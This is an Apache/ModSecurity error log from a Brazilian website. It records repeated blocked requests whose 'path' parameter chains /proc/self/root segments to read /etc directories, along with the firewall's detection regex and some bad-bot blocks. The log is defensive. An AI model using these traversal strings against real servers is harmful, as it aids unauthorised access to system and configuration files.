https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:27:41.175925 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:41500] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrSffu8EFLIOrSqIpseWgAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:27:50.383281 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:41502] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrShda6ubjKNq_cu4a5-gAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:27:53.899286 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:34230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrSieyqAr6etmhZHNriSwAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:28:12.847374 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.241.31:57110] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrSnCmAPhZkrhU8w4mJXgAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:28:31.255752 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:34244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrSr8df6f5d65gmYZTwcQAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:28:34.111659 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:37218] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrSsuoXxyEfFpUF8f-KSwAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:28:45.655208 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:47430] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrSveyqAr6etmhZHNrieAAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:28:57.229324 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:40732] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrSycdf6f5d65gmYZTwiAAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:29:09.465491 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.228.61:44488] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrS1UzinOy1jxa1j4cymwAAARA"]
[Wed Mar 18 13:29:10.881900 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.244.43:60254] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrS1uw_le52K8_3pV358wAAAhU"]
[Wed Mar 18 13:29:33.433536 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.241.31:37862] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrS7SmAPhZkrhU8w4mJrgAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:29:56.710806 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.241.31:47042] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrTBAkwaGbbGflqUZAs4QAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 13:30:10.491443 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:58936] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrTEuoXxyEfFpUF8f-KtQAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:30:14.847317 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.241.31:33426] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrTFuoXxyEfFpUF8f-KuwAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:30:33.759575 2026] [:error] [pid 14269:tid 140411691570944] [client 74.7.243.128:33964] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrTKQbLMZ6AikZjR9XbqAAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:30:35.107232 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:40964] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrTK-yqAr6etmhZHNrimgAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:30:49.911042 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.241.31:43642] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrTOcdf6f5d65gmYZTw5gAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:31:01.717886 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.241.31:54958] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrTROyqAr6etmhZHNrirwAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 13:31:06.519058 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.243.128:40978] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrTSvu8EFLIOrSqIpse3QAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:31:46.978766 2026] [:error] [pid 14269:tid 140411691570944] [client 74.7.243.128:37548] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrTcgbLMZ6AikZjR9Xb4AAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:31:51.491564 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.243.128:50182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrTd_u8EFLIOrSqIpse-QAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 13:31:59.607890 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.241.31:57058] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrTf-w_le52K8_3pV36cgAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 13:32:01.662564 2026] [mime_magic:error] [pid 15826:tid 140411582465792] (70014)End of file found: [client 57.141.18.4:59922] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
